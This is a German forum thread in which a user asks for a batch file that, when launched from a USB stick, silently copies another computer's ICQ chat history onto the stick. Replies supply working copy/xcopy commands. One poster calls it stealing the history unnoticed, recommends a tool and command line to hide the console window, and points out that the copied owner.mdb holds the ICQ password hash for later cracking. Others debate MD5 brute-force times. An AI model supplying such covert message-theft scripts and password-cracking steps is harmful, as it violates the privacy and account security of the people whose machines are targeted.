murb.com Hauptseite  •   Registrieren  •  SUCHE  •  FAQ  •  Mitgliederliste  •  Forenregeln  •  Login
Neue Antwort erstellen Batch-datei-Code für die Kopie der ICQ-History
Gehe zu Seite 1, 2  Weiter
Batch-datei-Code für die Kopie der ICQ-History
Jule
Beiträge: 139
Antworten mit Zitat
Hallo zusammen,

ich suche schon länger einen richtigen Code für ein Prgramm. Ich habe mir überlegt ob es gehen würde, dass ich eine Datei (.exe ; .batch) so programmiere, dass wenn man sie startet(von einem USB-Stick), die messages.mdb also die History von ICQ, auf meinen USB-Stick kopiert wird.

Auf gut Deutsch: Datei ausführen - messages.mdb auf dem USB-Stick, von der die Datei gestartet wurde.

Ist sowas möglich? Bin schon nämlich schon eine ganze Weile an der Sache dran, bekomme eaber einfach nichts hin



liebe grüße
Jule
Benutzer-Profile anzeigenAlle Beiträge von Jule anzeigenPrivate Nachricht senden
JayTee
Moderator
Beiträge: 299
Antworten mit Zitat
Klar geht sowas - die messages.mdb liegt aber im Unterordner der jeweiligen ICQ - Nummer. Soll man die Nummer beim Start angeben können oder einfach alle vorhandenen Ordner durchsuchen und evtl mehrere Dateien auf den Stick kopieren ? Oder willst Du das ganze auf eine bestimmte Nummer beschränken ?
Benutzer-Profile anzeigenAlle Beiträge von JayTee anzeigenPrivate Nachricht sendenICQ-Nummer
ERROR
Beiträge: 106
Antworten mit Zitat
also du könntest dir natürlich den ganzen persönlichen Ordner kopieren, z. B.

xcopy "%AppData%\ICQ\*.*" "ZIEL\" /E /C /G /H /Q /K /Y /I

im ZIEL Verzeichniss ist dann der Ordner mit der entsprechenden Nummer, in dem dann die messages.mdb ist.



Für mich klingt das außerdem so, als wenn du den Verlauf "klauen" willst, ohne dass man es merkt. In diesem Fall kann ich dir cmdow.exe empfehlen http://www.commandline.co.uk/cmdow/
Dann musst du einfach die heruntergeladene cmdow.exe in den Ordner, in dem die *.bat ist ziehen und in die *.bat als erste Zeile

cmdow.exe C:\Windows\system32\cmd.exe /HID

einfügen.
praktischer Nebeneffekt wenn du den ganzen Ordner mit der Nummer kopierst: du hast die owner.mdb auch dabei, die du mit dem ICQ Passwort Hasher später ganz in Ruhe auslesen und z. B. mit http://md5cracker.org/ entschlüseln kannst.



mfg
Benutzer-Profile anzeigenAlle Beiträge von ERROR anzeigenPrivate Nachricht senden
Bibber
Beiträge: 79
Wohnort: Germany
Antworten mit Zitat
Man kann MD5 nicht entschlüsseln! Merkt euch das doch mal. Es werden dort lediglich Hashtabellen durchsucht. Bei deiner URL da scheitern schon alle Versuche das simple Passwort 1+2=3 zu "entschlüsseln".

_________________
Benutzer-Profile anzeigenAlle Beiträge von Bibber anzeigenPrivate Nachricht sendenWebsite dieses Benutzers besuchenICQ-Nummer
Jule
Beiträge: 139
Antworten mit Zitat
Die nummer soll beim Start nicht angegeben werden. Man soll lediglich nur die Datei ausführen und daduch soll die Message.mdb (bzw. es ist ja kein Nachteil wenn alle Mesage.mdbs kopiert werden) auf den Stick kopiert werden. Wie genau würde denn ein solcher Parameter in einer Batch Datei aussehen wenn ich beispielsweise die message.mdb von der ICQ# 123456789 haben will / oder auch den ganzen Ordner wie ERROR geschrieben hat?

cmdow hört sich nicht schlecht an, leider springt AntiVir darauf an, was dann wiederum den "HIDE" Effekt aufhebt..
Benutzer-Profile anzeigenAlle Beiträge von Jule anzeigenPrivate Nachricht senden
ERROR
Beiträge: 106
Antworten mit Zitat
komisch, mein antivir lässts ohne probleme durch ...

für die message.mdb von 123456789 würde es so lauten:

xcopy "%AppData%\ICQ\123456789\message.mdb" "ZIEL\" /E /C /G /H /Q /K /Y /I



@ Bibber natürlich kann man md5 nicht entschlüsseln sondern nur in tabellen auslesen aber kein normaler Mensch hat das passwort 1+2=3
bei den accs von meinen Freunden, die ihr passwort vergessen haben hat's immer funktioniert.
Benutzer-Profile anzeigenAlle Beiträge von ERROR anzeigenPrivate Nachricht senden
ERROR
Beiträge: 106
Antworten mit Zitat
habs übrigens grad probiert, wenn du =3 weglässt klappts wieder
Benutzer-Profile anzeigenAlle Beiträge von ERROR anzeigenPrivate Nachricht senden
Bibber
Beiträge: 79
Wohnort: Germany
Antworten mit Zitat
ERROR hat Folgendes geschrieben:
bei den accs von meinen Freunden, die ihr passwort vergessen haben hat's immer funktioniert.

Dann haben deine Freunde aber ziemlich unsichere Passwörter, denn normalerweise kannst du das bei 6-8 Zeichen schon vergessen. Bei Beachtung von Groß-/Kleinschreibung + Zahlen (ohne Sonderzeichen) kommt man bei einem 6-stelligen Passwort schon auf knappe 50 Billionen Möglichkeiten. Solche großen Hashtabellen hat kein Mensch. Treffer damit so gut wie unmöglich ... außer man benutzt irgendwelche gängigen einfachen Wörter oder Zahlenkombinationen. Deine Freunde sollten sich wirklich Gedanken machen.

Zum Thema:
xcopy ist unnötig wenn man nur eine einzelne Datei kopieren will ... vor allem die ganzen Parameter.
Folgender Befehl reicht völlig aus um die Messages.mdb in den gleichen Ordner wie die Batch-Datei zu kopieren:
Code:
@echo off
copy "%AppData%\ICQ\123456789\Messages.mdb" "%~dp0" /Y

_________________
Benutzer-Profile anzeigenAlle Beiträge von Bibber anzeigenPrivate Nachricht sendenWebsite dieses Benutzers besuchenICQ-Nummer
PainT
Administrator
Beiträge: 5115
Antworten mit Zitat
Also bei mir schafft er es den Hash C84180BAFD4E065B301F93CBCDBDA38E zu "entschlüsseln" (InsidePro). Natürlich kann ein Hash nicht entschlüsselt werden, aber umgangssprachlich kann man das durchgehen lassen. Viele sagen ja auch "einzigste". Wink

Wie kommst du auf 50 Billionen? Bei mit kommt 56.800.235.584 (62^6) raus. Und da es bereits Hash-Cracker gibt die mehrere hundert Millionen Hashs pro Sekunde erstellen und vergleichen können (siehe LHC), wäre so ein Hash in wenigen Minuten geknackt. Bei einem achtstelligen Passwort mit Groß-/Kleinschreibung, Zahlen und den gängigsten Sonderzeichen braucht man nur ein paar mehr GPUs und es wäre auch kein Problem Razz
Benutzer-Profile anzeigenAlle Beiträge von PainT anzeigenPrivate Nachricht sendenE-Mail sendenWebsite dieses Benutzers besuchenICQ-Nummer
Jule
Beiträge: 139
Antworten mit Zitat
ich hab jetzt eine batch datei erstellt;

wenn ich sie von meinem Datenträger (F) ausführe, müsste der Code doch so aussehen?

@echo off
copy "%AppData%\ICQ\meineICQ#\Messages.mdb" "%~dp0" /F


auch der xcopy code geht nicht welchen ich so in die Datei geschrieben habe:

xcopy "%AppData%\ICQ\123456789\message.mdb" "ZIEL\"/F


leider tut sich da beidesmal nichts..
was mach ich falsch?

Lg
Benutzer-Profile anzeigenAlle Beiträge von Jule anzeigenPrivate Nachricht senden
JayTee
Moderator
Beiträge: 299
Antworten mit Zitat
Hmm, wenn ich das richtig sehe, musst Du keinen Laufwerksbuchstaben angeben, funktioniert auch ohne. Das /Y sagt nur, dass er nicht nachfragen soll, wenn er was überschreibt.
Benutzer-Profile anzeigenAlle Beiträge von JayTee anzeigenPrivate Nachricht sendenICQ-Nummer
Jule
Beiträge: 139
Antworten mit Zitat
hab jetzt mal beide codes so übernommen wie sie dranstanden, ohne Angabe des Laufwerks oder einer anderen Zuordnung.
Da geht immer das DOS-Fenster für kurze Zeit auf, aber die Datei/Ordner wird leider nicht verschoben...
hab ne Weile rummversucht, leider ohne Erfolg (bissher) Sad
Benutzer-Profile anzeigenAlle Beiträge von Jule anzeigenPrivate Nachricht senden
JayTee
Moderator
Beiträge: 299
Antworten mit Zitat
ICQ muss aus sein, weil es sonst Zugriff auf den Ordner verweigert.
Benutzer-Profile anzeigenAlle Beiträge von JayTee anzeigenPrivate Nachricht sendenICQ-Nummer
Bibber
Beiträge: 79
Wohnort: Germany
Antworten mit Zitat
PainT hat Folgendes geschrieben:
Wie kommst du auf 50 Billionen? Bei mit kommt 56.800.235.584 (62^6) raus. Und da es bereits Hash-Cracker gibt die mehrere hundert Millionen Hashs pro Sekunde erstellen und vergleichen können (siehe LHC), wäre so ein Hash in wenigen Minuten geknackt. Bei einem achtstelligen Passwort mit Groß-/Kleinschreibung, Zahlen und den gängigsten Sonderzeichen braucht man nur ein paar mehr GPUs und es wäre auch kein Problem Razz

Du hast Recht, es sind nur Milliarden. Aber dennoch: die Geschwindigkeit, die dort propagiert wird, wird eh nie erreicht. Beispiel ICQ: 6-8 Zeichen (was ziemlich kurz ist) Groß/-Kleinschr. + Zahlen + ein paar Sonderzeichen (mal angenommen 26 + 26 + 10 + 5 = 67 Zeichen). Macht an Möglichkeiten: 67^6 + 67^7 + 67^8 = 412.218.847.544.133 ... gehen wir mal von der schnellsten GraKa aus: 608.000.000 Passwörter pro Sekunde, dauert das ganze im schlimmsten Fall immer noch 677991s = 188h = ca. 8 Tage. Für den Heimanwender unknackbar. Und da die Geschwindigkeit eh nicht erreicht wird, dauert es um ein Vielfaches länger. Zumal LHC bei mir gar nicht erst läuft -> cuInit() failed.
Und dein Testpasswort "InsidePro" ist auch eins von der unsichersten Sorte, die es überhaupt gibt. Schlimmer wäre nur noch alles kleingeschrieben.

Bei anderen Passwörtern von Längen wie 8-15 Zeichen hättest du erst recht keine Chance mehr. Das würdest du zu Lebzeiten nicht mehr rausbekommen. Nichtmal deine Urenkel.

_________________
Benutzer-Profile anzeigenAlle Beiträge von Bibber anzeigenPrivate Nachricht sendenWebsite dieses Benutzers besuchenICQ-Nummer
Jule
Beiträge: 139
Antworten mit Zitat
also um nochmals zurück auf das Thema zu kommen, die Datei wird bei beiden Codes nicht auf mein stick kopiert, auch wenn ICQ aus ist!
An was könnte das liegen? Gibt es da noch eine andere Methode oder einen anderen Code über welchen das ablaufen könnte?

lg
Benutzer-Profile anzeigenAlle Beiträge von Jule anzeigenPrivate Nachricht senden
Batch-datei-Code für die Kopie der ICQ-History
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 2  

  
  
 Neue Antwort erstellen  
Powered by phpBB © phpBB Group
Design by phpBBStyles.com | Styles Database.
Content © murb.com - Forum